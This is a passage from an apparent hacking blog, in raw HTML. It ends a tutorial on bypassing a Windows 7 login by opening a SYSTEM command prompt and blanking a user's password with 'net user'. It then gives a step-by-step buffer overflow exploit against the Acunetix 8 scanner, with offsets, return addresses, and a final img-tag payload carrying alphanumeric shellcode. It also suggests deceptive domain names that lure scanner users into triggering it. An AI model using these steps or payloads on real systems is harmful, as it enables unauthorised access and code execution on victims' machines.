Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 18. Press the <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Shift</strong> key five times</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> A command prompt opens. Let’s see who are logged in as.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 19. Type <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">whoami</strong> in the command prompt and press <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Enter</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> The command prompt returns the answer <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">NT AUTHORITY\SYSTEM</strong>. This means that we are logged in as a local system account with highest level privileges. It is often used to run different background services on a Windows computer. Now let’s use this to remove the password of the user ifconfig.</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 20. Type <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">net user</strong> and press Enter to see the accounts on this computer</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> In this tutorial the only account on the computer is ifconfig</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 21. Type net user <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">ifconfig *</strong> and press <strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;">Enter</strong></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 22. You can now enter a new password – here we just leave it blank</div> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs8sxnSYoC_7hV7DWZacVCnTh_cjdyIdvKVqDn7sDyAeWqqftPxCsYn395OFj1eKc5OKvG8jiA5FuNyc2G5PBHI9-uzLTz9oum6d88IXxjl9xXAuUfqWFmr7plBqOz9KAIAdSP_9IIp5k/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs8sxnSYoC_7hV7DWZacVCnTh_cjdyIdvKVqDn7sDyAeWqqftPxCsYn395OFj1eKc5OKvG8jiA5FuNyc2G5PBHI9-uzLTz9oum6d88IXxjl9xXAuUfqWFmr7plBqOz9KAIAdSP_9IIp5k/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <br /></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 23. Close the command prompt</div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> 24. Login as the user ifconfig without a password</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB3yYQbrz2xZWjVuJlpGknRCTIwlrPknFRnmEaeRj_upjTQ_v2WQHWrX0PMG09LvKvA9Cio7aVDU5wNoqlb-Ca9mddHyfoqPWvQk3_LwFx5poHXlvVa_gr4r2bFQJX6j1TXauFg-Gy0d8/s1600/Hack-Windows-7-Account-Password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB3yYQbrz2xZWjVuJlpGknRCTIwlrPknFRnmEaeRj_upjTQ_v2WQHWrX0PMG09LvKvA9Cio7aVDU5wNoqlb-Ca9mddHyfoqPWvQk3_LwFx5poHXlvVa_gr4r2bFQJX6j1TXauFg-Gy0d8/s1600/Hack-Windows-7-Account-Password.jpg" /></a></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <br /></div> <div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; color: #222222; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 24px; padding: 0px; vertical-align: baseline;"> <span style="background-color: white;">We can now see that the login was successful. The method should work on Windows 8 as well. This tutorial serves to prove that if you store sensitive information on you Windows computer, you should not rely on the Standard Windows password protection alone.</span></div>

Hacking Tutorials Hack Windows 7 Account Password

The password protection in Windows is a good precaution against nosy individuals. But really it is not that safe. If someone really want to get access to a password protected Windows computer – they probably will. There are software out there to help…

Read more »

Acunetix 0day

A few weeks ago I have published an article about WINRAR 0DAY.<br /> <br /> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> Many people wrote to me about the problems of that kind of article (<a href="http://thehackernews.com/2014/04/winrar-file-extension-spoofing.html" target="_blank">for example</a>).</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> So this time I’m goanna reveal a new 0DAY that will help security managers to protect their web sites against many vulnerability scans.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> A lot of sites owners will tell you that the majority numbers of scans, performed against their sites, are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> Today 0DAY will be focused on one of the most popular web scan in the world, ACUNETIX.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> The POC will be against ACUNETIX 8 (build 20120704 since it’s one of the most common cracked version which was published in the net and used by many newbie hackers).</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, reason to think twice before they press the “SCAN” button.</div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> In this article, I will not give a full working exploit for all scan scenarios nor for all operating systems, but a proof of concept t<span style="font-size: x-small;">hat hopefully will </span>grow into a new effort of research for vulnerabilities in Penetration test tools. </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> </div> <div class="MsoNormal" dir="ltr" style="text-align: left;"> <br /> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <span style="font-family: Calibri;">So let’s get our hands dirty </span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9el40T2HbCpgoigOj51KdUoZ6HAmqCMhAsNrKu3NEFD8716qdoNBlZaGvsikLCS4e-4lkLm4hvyrIyOB6X7fvlfzTEPOKlm6UIYn-ETw-FymVJidYSinqzi6oeBgAvhzHFGCvTIKX0sw/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9el40T2HbCpgoigOj51KdUoZ6HAmqCMhAsNrKu3NEFD8716qdoNBlZaGvsikLCS4e-4lkLm4hvyrIyOB6X7fvlfzTEPOKlm6UIYn-ETw-FymVJidYSinqzi6oeBgAvhzHFGCvTIKX0sw/s1600/Acunetix_0day.jpg" width="400" /></a></div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> </div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <span style="font-family: Calibri;"><span style="font-size: x-small;">ACUNETIX is a powerful tool for</span> scanning and finding vulnerabilities at websites.</span></div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <span style="font-family: Calibri;">Many newbie attackers tend to use this tool due to the simplicity of its use.</span></div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <span style="font-family: Calibri;">ACUNETIX offers its users a simple wizard base scan that covers many aspects of the vulnerability scan.</span></div> <span style="font-family: Calibri;">One of the aspects is the ability to scan more domains or sub domains related to the scanned website.</span><br /> <span style="font-family: Calibri;">For example, if we scan my blog “http://1337bloggerz.blogspot.com”, we will get the result shown below:</span><span style="font-family: Calibri;"> </span></div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <br /> <div class="separator" style="clear: both; text-align: center;"> <span style="font-family: Calibri;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm3Afma-sO_SzbekF1KJWBHGaLoUu489ikcuGixm0hwrUHlp-9hXzOIC-dwQYTLeIf4aOam3YhQK3UJHYTc7wLWEhrq4Hfa0RUTTP47fuyVFTS9-R40hxU-vCWez0yYI8F3CNYel28E2o/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm3Afma-sO_SzbekF1KJWBHGaLoUu489ikcuGixm0hwrUHlp-9hXzOIC-dwQYTLeIf4aOam3YhQK3UJHYTc7wLWEhrq4Hfa0RUTTP47fuyVFTS9-R40hxU-vCWez0yYI8F3CNYel28E2o/s1600/Acunetix_0day.jpg" width="640" /></a></span></div> <span style="font-family: Calibri;"> </span></div> <div class="MsoNormal" style="margin: 0in 0in 10pt; text-align: justify;"> <br /> <div class="MsoNormal" style="text-align: justify;"> After a little research about this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> <span style="mso-spacerun: yes;"></span>Furthermore the wizard learns about the external related domains from the external sources that appear at the website, for example:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> <div class="MsoNormal" style="text-align: justify;"> “<img src=<span style="color: red;">http://externalSource.com/someimg.png </span>>”</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> “<a href=<span style="color: red;">http://externalSource.com/ </span>></a>”</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> <span style="mso-spacerun: yes;"> </span>Etc...</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Further Analysis reveals that if one of the<span style="mso-spacerun: yes;"> </span>external domain name<span style="mso-spacerun: yes;"> </span>length is more than 268 Byte’s, ACUNETIX will be crashed , so if we want to cause a crash, all we need to do is to put some kind of external source at our site, which have the length of 268 Byte’s or more, say something like this:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <blockquote class="tr_bq"> <div class="MsoNormal" style="text-align: justify;"> <code><A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”> </code></div> </blockquote> <br /> <div class="MsoNormal" style="text-align: justify;"> Quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused access violation:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJknyqffjHndUQx9v9oZ_uT6oLDeH-Z0-CIHlvPQz1Ea6d9HAsHy39MY7k0diWgUDYi0l6wsUdEvXJRsoIpyFD_sbt3Dr7AT0GlxZWFSba1yCMgSowLNKcCadzWirEVkh4JYr36aBpVMY/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJknyqffjHndUQx9v9oZ_uT6oLDeH-Z0-CIHlvPQz1Ea6d9HAsHy39MY7k0diWgUDYi0l6wsUdEvXJRsoIpyFD_sbt3Dr7AT0GlxZWFSba1yCMgSowLNKcCadzWirEVkh4JYr36aBpVMY/s1600/Acunetix_0day.jpg" width="640" /></a></div> <div class="MsoNormal" style="text-align: justify;"> </div> <br /> <div class="MsoNormal" style="text-align: justify;"> Despite the fact that further writing runs over the Structured Exaction Handler (SEH) as you will probably notice ,my advice for you is not to go that way, believe me I tried it for several days with no success (because of the safe SHE mechanism).</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> However, we have another problem with this<span style="mso-spacerun: yes;">  </span>exploit, In one word, “ASCII”.</div> <div class="MsoNormal" style="text-align: justify;"> ACUNETIX gets its information about external domains as a URL.</div> <div class="MsoNormal" style="text-align: justify;"> This fact causing the string to be converted into Web Browser friendly string. </div> <div class="MsoNormal" style="text-align: justify;"> While ASCII accepts chars like: </div> <div class="MsoNormal" style="text-align: justify;"> 0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> URL string accepts only printable alphanumeric chars and URL converted special chars (with few exceptions).</div> <div class="MsoNormal" style="text-align: justify;"> So if my external source contains one of the special chars, they will be converted into<span style="mso-spacerun: yes;">          </span></div> <div class="MsoNormal" style="text-align: justify;"> ”%SOMETHING”.</div> <div class="MsoNormal" style="text-align: justify; vertical-align: top;"> For example, the char "quotes" (“) will be converted into 253232 in the memory because it’s the translation of %22.</div> <div class="MsoNormal" style="text-align: justify; vertical-align: top;"> </div> <div class="MsoNormal" style="text-align: justify;"> Another example that demonstrates the URL encoding is: the char "percent" (%) <span style="mso-spacerun: yes;"> </span>which will be converted into 253235 in the memory.</div> <div class="MsoNormal" style="text-align: justify;"> Bypassing it, will be by building an exploit that contains only "A-Z, a-z, 1-0" chars and few special chars that aren’t converted in the process of URL ENCODE like:</div> <div class="MsoNormal" style="text-align: justify;">  "! ( ) = } { " .</div> <div class="MsoNormal" style="text-align: justify;"> (not a simple job at all) </div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> In short, I had to find a way to fix the flow of the application in order to avoid SEH based exploit (Because it was impossible to bypass safe SHE protection with URL ASCII strings only).</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Finally, I found a way.<br /> In order to fix the flow, EDX had to be overwritten with a readable memory address.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Nevertheless, it is important to remember that EDX is not been used as is, but minus 8:</div> <div class="MsoNormal" style="text-align: justify;"> <br /> <blockquote class="tr_bq"> <code>MOVE ECX, DWORD PTR DS: [EDX-8];</code></blockquote> <br /> <div class="MsoNormal" style="text-align: justify;"> Meaning that it doesn’t matter which memory address we use, we should add 8 to the address (in the exploit), convert the whole address into printable URL STRING, and hope to the best.</div> <br /> <div class="MsoNormal" style="text-align: justify;"> After little research, I found such an address.</div> <div class="MsoNormal" style="text-align: justify;"> The address was at “0x663030XX” and luckily it had the possibility to be converted into URL String without special bad char's --> " f005 ".</div> <div class="MsoNormal" style="text-align: justify;"> After playing with the code I found that the exact location of that EDX overwrite, is at 268 Byte's offset.</div> <div class="MsoNormal" style="text-align: justify;"> So for now our exploit looks like this:</div> </div> <div class="MsoNormal" style="text-align: justify;"> <blockquote class="tr_bq"> <code><img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA<b><span style="color: red;">500f</span></b>BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”></code></blockquote> <br /> <br /> <div class="MsoNormal" style="text-align: justify;"> Running ACUNETIX's scan against that payload, caused the next result:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAtVNCT_s2GH-31dqUoaK7Lz8Y16skEW22LbSfWnSfiOwQwvxcg0pMF0JBpwYywsU85t0xDVwESs5BA1GTJffDJD9qA_hgUzh7ytfMrkjPTIXKnPUFAVV9gbfCQH8Jcndhw4PfHWb-Ois/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAtVNCT_s2GH-31dqUoaK7Lz8Y16skEW22LbSfWnSfiOwQwvxcg0pMF0JBpwYywsU85t0xDVwESs5BA1GTJffDJD9qA_hgUzh7ytfMrkjPTIXKnPUFAVV9gbfCQH8Jcndhw4PfHWb-Ois/s1600/Acunetix_0day.jpg" width="640" /></a></div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> </div> </div> <div class="MsoNormal" style="text-align: justify;"> <br /> <div class="MsoNormal" style="text-align: justify;"> As you can see above, the EIP was overwritten!!</div> <div class="MsoNormal" style="text-align: justify;"> It appears that the idea of fixing the flow was successful since it enabled me to be in a better position of attack (EIP overwrite).<span style="mso-spacerun: yes;">  </span></div> <div class="MsoNormal" style="text-align: justify;"> Beside it, our potential space for shell code is now presented in EAX and ESP.</div> <div class="MsoNormal" style="text-align: justify;"> When it comes to the decision whether choosing ESP or EAX, ESP is a better choice from two different aspects:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> One, ESP is pointing directly at the beginning of the shell string.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Two, there is much more space for a biggest shell code to be written.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> After I chose ESP, I needed to find an instruction of “JMP ESP” in a memory address that could be written by URL string (limited ASCII as mention above).</div> <div class="MsoNormal" style="text-align: justify;"> The desired address successfully founded at the location of: 0x7e79515d (SXS.DLL) – </div> <div class="MsoNormal" style="text-align: justify;"> (In ASCII “ ]Qy~ “).</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> After all that, our shell code supposed to look like this:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <blockquote class="tr_bq"> <div class="MsoNormal" style="text-align: justify;"> <code><img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA<b><span style="color: red;">500f</span></b>BBBB<b><span style="color: green;">]Qy~</span></b>BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”></code></div> </blockquote> <br /> <ul style="text-align: left;"> <li><span style="color: red;">500f</span> = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.</li> </ul> <ul style="text-align: left;"> <li><span style="color: #00b050;">]Qy~</span> = 0x7e79515d (JMP ESP from SXS.DLL).</li> </ul> <br /> <div class="MsoNormal" style="text-align: justify;"> OK, right now we are at the semifinal stage, running the application against above payload, produced the next result:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoKeMXrhaYvj4rrtgEBZHlbMR77CnGvj8UipORF1mk0jaaMj7BRVVK-DZmFOBvTKXjHDgtfoGzz-PGzf3TxTLAyuSOc-BDcXCiBvYW16WVDOKtw9Gbwsa6VGGGSlVM0z2ENFKMOkSDygo/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoKeMXrhaYvj4rrtgEBZHlbMR77CnGvj8UipORF1mk0jaaMj7BRVVK-DZmFOBvTKXjHDgtfoGzz-PGzf3TxTLAyuSOc-BDcXCiBvYW16WVDOKtw9Gbwsa6VGGGSlVM0z2ENFKMOkSDygo/s1600/Acunetix_0day.jpg" width="640" /></a></div> <div class="MsoNormal" style="text-align: justify;"> </div> <br /> <br /> <div class="MsoNormal" style="text-align: justify;"> Yea… we landed exactly at the beginning of the final payload.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> </div> <br /> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> The next step will be to use suitable windows shell that will be made only from URL string (limited ASCII).</div> <div class="MsoNormal" style="text-align: justify;"> Such shell can be generated with “ Metasploit ” and it is called "Alphanumeric Shell".</div> <div class="MsoNormal" style="text-align: justify;"> The important thing to remember while using such payload, is that the payload's start address must be presented at one of the registers. If the payload presents at ESP, the first OP CODE of the shell need to be "PUSH ESP".</div> <div class="MsoNormal" style="text-align: justify;"> In my Proof of concept, I used simple "CALC.EXE" shell code generated by “Metasploit<span style="mso-spacerun: yes;">  </span>that<span style="mso-spacerun: yes;">  </span>led me to the final stage which is ;working exploit!!</div> <div class="MsoNormal" style="text-align: justify;"> Moreover, our exploit is successfully bypassing DEP protection, simply by choosing only the addresses that aren’t compiled with DEP.</div> <div class="MsoNormal" style="text-align: justify;"> And due to the fact that ACUNETIX itself is not complied with DEP, this exploit should work perfectly on windows XP.</div> <div class="MsoNormal" style="text-align: justify;"> <br /></div> <div class="MsoNormal" style="text-align: justify;"> After successfully reaching all our goals, Let’s look on the final working exploit:<br /> <br /> <blockquote class="tr_bq"> <div class="MsoNormal" style="text-align: justify;"> <code> <img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”> </code> </div> </blockquote> <br /> <br /> We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name, in the list of the extra domains in ACUNETIX wizard window. <br /> <br /> <div class="MsoNormal" style="text-align: justify;"> So what can we do in order to make our domain name attractive?</div> <div class="MsoNormal" style="text-align: justify;"> Thinking about it, I came up with two ideas:</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> 1: writing some attempting domain name that will make the hackers check that domain, like, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il<span style="mso-spacerun: yes;">  </span>.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> 2: using several external domains with the following names: </div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> “SQLINJECTION”</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> “XSS”</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> “CSRF”</div> <div class="MsoNormal" style="text-align: justify;"> And so on…</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> These kind of names will probably give the eye of the hacker the feeling that the domain list window is actually an options window. </div> <div class="MsoNormal" style="text-align: justify;"> The written code bellow demonstrates that kind of misleading:</div> <div 